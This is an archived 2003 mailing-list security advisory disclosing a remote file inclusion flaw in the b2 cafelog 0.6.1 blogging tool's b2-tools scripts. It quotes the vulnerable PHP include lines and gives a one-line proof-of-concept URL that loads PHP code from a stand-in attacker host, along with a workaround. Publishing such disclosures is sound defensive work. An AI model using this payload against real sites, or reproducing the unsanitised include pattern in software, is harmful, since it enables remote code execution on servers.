[VulnWatch] b2 cafelog 0.6.1 remote command execution.
From: pokleyzz (pokleyzz_at_scan-associates.net)
Date: 05/29/03
- Previous message: pokleyzz: "[VulnWatch] Geeklog 1.3.7sr1 and below multiple vulnerabilities."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Thu, 29 May 2003 15:22:38 +0800 To: vulnwatch@vulnwatch.org, bugtraq@securityfocus.com
Products: b2 cafelog 0.6.1 (http://cafelog.com/)
Date: 29 May 2003
Author: pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net
shaharil_at_scan-associates.net
munir_at_scan-associates.net
URL: http://www.scan-associates.net
Summary: b2 cafelog 0.6.1 remote command execution.
Description
===========
b2 cafelog is blogger system written in php with mysql ad database backend.
Details
=======
b2 cafelog 0.6.1 come with directory b2-tools. This directory contain 2
php scripts
(blogger-2-b2.php and gm-2-b2.php) which allow user to specify $b2inc and do
remote code injection.
from blogger-2-b2.php line 21
-----------------------------------------------------
case "step1":
include("b2config.php");
include("$b2inc/b2functions.php");
include("$b2inc/b2vars.php");
------------------------------------------------------------------------------------
from gm-2-b2.php line 5
----------------------------------------------------------
// 3. load in the browser from there
include("b2config.php");
include($b2inc."/b2functions.php");
-----------------------------------------------------------------------------------
Proof of concept
===========
http://blabla.com/b2-tools/gm-2-b2.php?b2inc=http://attacker.com
attacker.com have file named b2functions.php with php script you want to
execute.
Workaround
=========
Remove b2-tools directory.
Vendor Response
===============
Vendor has been contacted on 19/05/2003 but to reply given.
- Previous message: pokleyzz: "[VulnWatch] Geeklog 1.3.7sr1 and below multiple vulnerabilities."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
